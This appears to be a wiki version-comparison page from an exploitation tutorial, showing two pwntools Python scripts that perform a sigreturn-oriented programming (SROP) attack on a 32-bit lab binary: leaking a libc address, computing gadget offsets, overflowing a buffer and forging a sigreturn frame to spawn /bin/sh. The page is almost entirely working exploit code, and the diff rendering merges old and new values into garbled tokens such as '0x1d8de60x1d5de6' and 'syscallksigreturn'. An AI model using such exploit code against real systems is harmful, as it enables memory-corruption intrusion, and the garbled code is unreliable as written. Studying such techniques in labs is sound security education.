Versions Compared

Old Version 4

changes.mady.by.user Lazenca.0x0

Saved on

compared with

New Version 5

changes.mady.by.user Lazenca.0x0

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
languagepy
titlesrop.py
from pwn import *
  
binary = ELF('./srop32')
p = process(binary.path)

p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)

#You need to change the value to match the environment you are testing.
libcBase = stackAddr - 0x49020
syscall = libcBase + 0x1d8de60x1d5de6
binsh = libcBase + 0x15902b
ksigreturn = libcBase + 0x1d8de00x1d5de0

print 'The base address of Libc    : ' + hex(libcBase)
print 'Address of syscall gadget   : ' + hex(syscall)
print 'Address of string "/bin/sh" : ' + hex(binsh)
print 'Address of sigreturn()      : ' + hex(ksigreturn)

exploit = ''
exploit += "\x90" * 66
exploit += p32(ksigreturn)
exploit += p32(0x0)
 
exploit += p32(0x0)         #GS
exploit += p32(0x0)         #FS
exploit += p32(0x0)         #ES
exploit += p32(0x0)         #DS
exploit += p32(0x0)         #EDI
exploit += p32(0x0)         #ESI
exploit += p32(0x0)         #EBP
exploit += p32(syscall)     #ESP
exploit += p32(binsh)       #EBX
exploit += p32(0x0)         #EDX
exploit += p32(0x0)         #ECX
exploit += p32(0xb)         #EAX
exploit += p32(0x0)         #trapno
exploit += p32(0x0)         #err
 
exploit += p32(syscall)     #EIP
#Runed a 32bit program in the 64bit operation system.
exploit += p32(0x23)        #CS
exploit += p32(0x0)         #eflags
exploit += p32(0x0)         #esp_atsignal
exploit += p32(0x2b)        #SS
 
p.send(exploit)
p.interactive()#Runed a 32bit program in the 32bit operation system.
#exploit += p32(0x73)        #CS
#exploit += p32(0x0)         #eflags
#exploit += p32(0x0)         #esp_atsignal
#exploit += p32(0x7b)        #SS
 
p.send(exploit)
p.interactive()
  • pwntools를 이용해 조금더 편하게 코드를 작성할 수 있습니다.
Code Block
languagepy
titlesrop-pwn.py
from pwn import *
 
binary = ELF('./srop32')
p = process(binary.path)

p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
)
stackAddr = int(stackAddr,16)

#You need to change the value to match the environment you are testing.
libcBase = stackAddr - 0x49020
syscallksigreturn = libcBase + 0x1d8de60x1d5de0 
binshsyscall = libcBase + 0x15902b0x1d5de6 
ksigreturnbinsh = libcBase + 0x1d8de00x15902b

print 'The base address of Libc    : ' + hex(libcBase)
print 'Address of syscall gadget   : ' + hex(syscall)
print 'Address of string "/bin/sh" : ' + hex(binsh)
print 'Address of sigreturn()      : ' + hex(ksigreturn)
 
exploit = ''
exploit += "\x90" * 66
exploit += p32(ksigreturn) 	#ret
exploit += p32(0x0)

#Runed a 32bit program in the 64bit operation system.
frame = SigreturnFrame(kernel='amd64')
#Runed a 32bit program in the 32bit operation system.
#frame = SigreturnFrame(kernel='i386')
frame.eax = constants.SYS_execve0xb
frame.ebx = binsh
frame.esp = syscall 
frame.eip = syscall
 
exploit += str(frame)

p.send(exploit)
p.interactive()

...